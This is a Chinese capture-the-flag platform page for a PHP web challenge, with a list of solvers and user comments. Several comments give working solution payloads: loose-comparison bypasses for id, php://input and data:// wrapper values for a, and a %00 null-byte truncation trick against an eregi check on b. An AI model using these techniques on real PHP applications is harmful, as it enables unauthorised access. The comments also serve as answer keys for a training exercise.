评分(27)
解题动态
彗星 攻破了该题 8小时前
1302074808 攻破了该题 14小时前
影人sha 攻破了该题 2天前
2523822945 攻破了该题 2天前
Tychema 攻破了该题 3天前
YS_JW 攻破了该题 3天前
zuaiyio 攻破了该题 4天前
小崔 攻破了该题 4天前
cha8e1 攻破了该题 4天前
anton_小金鱼 攻破了该题 4天前
shu-jia 攻破了该题 4天前
陆庆顺 攻破了该题 5天前
Hackerchen 攻破了该题 6天前
Kernel1 攻破了该题 6天前
故里love长安 攻破了该题 7天前
一只小羊 攻破了该题 7天前
wujita01 攻破了该题 7天前
bugfuck2 攻破了该题 7天前
alden 攻破了该题 8天前
评论
FTJJJ 1天前
举报
POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!
bugfuck2 7天前
举报
查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a
霓虹 3月前
举报
wp解答的源代码不一样,避雷
对对对对对对对对 5月前
举报
依旧有点意思
soha 5月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 5月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
2686213396 9月前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag
iNMB 9月前
举报
?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......
zhuizhui 9月前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14
breeding 10月前
举报
curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345